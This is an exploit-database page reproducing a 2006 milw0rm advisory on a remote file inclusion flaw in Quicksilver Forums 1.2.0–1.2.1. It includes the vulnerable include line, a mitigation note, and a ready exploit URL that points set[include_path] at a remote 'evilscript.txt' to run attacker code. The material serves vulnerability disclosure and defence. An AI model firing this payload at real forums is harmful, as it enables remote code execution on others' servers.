header-logo
Suggest Exploit
vendor:
Quicksilver Forums
by:
mdx
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Quicksilver Forums
Affected Version From: 1.2.0
Affected Version To: 1.2.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Quicksilver Forums (v1.2.0)+(1.2.1) Remote File Inclusion Vulnerabilities

Quicksilver Forums versions 1.2.0 and 1.2.1 are vulnerable to a remote file inclusion vulnerability due to a lack of sanitization of user input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which will then include and execute the malicious file.

Mitigation:

Input validation should be used to prevent malicious user input from being passed to the vulnerable application. Additionally, the application should be configured to only include files from trusted sources.
Source

Exploit-DB raw data:

####################################################
#                                                  #
#           [ WWW.SecurityWall.orG ]               #
#                                                  #
####################################################

Quicksilver Forums [(v1.2.0)+(1.2.1)] (set[include_path]) Remote File Inclusion Vulnerabilities

####################################################

Author: mdx

####################################################

Class : Remote

####################################################

cont@ct: bilkopat[at]hotmail[dot]com

####################################################
[v1.2.0]+[v1.2.1]
Code: activeutil.php?

require_once $set['include_path'] . '/lib/bbcode.php';


Exploit:
http://www.site.com/[path]/lib/activeutil.php?set[include_path]=http://site.com/evilscript.txt?

####################################################

Greetz: [Cyber-warrior TIM USERS] , Dreamlord , xoron , The_bat_hacker , redx , dipsomania , Kizil_alev, ElHaCKeR :=)
####################################################

# milw0rm.com [2006-09-13]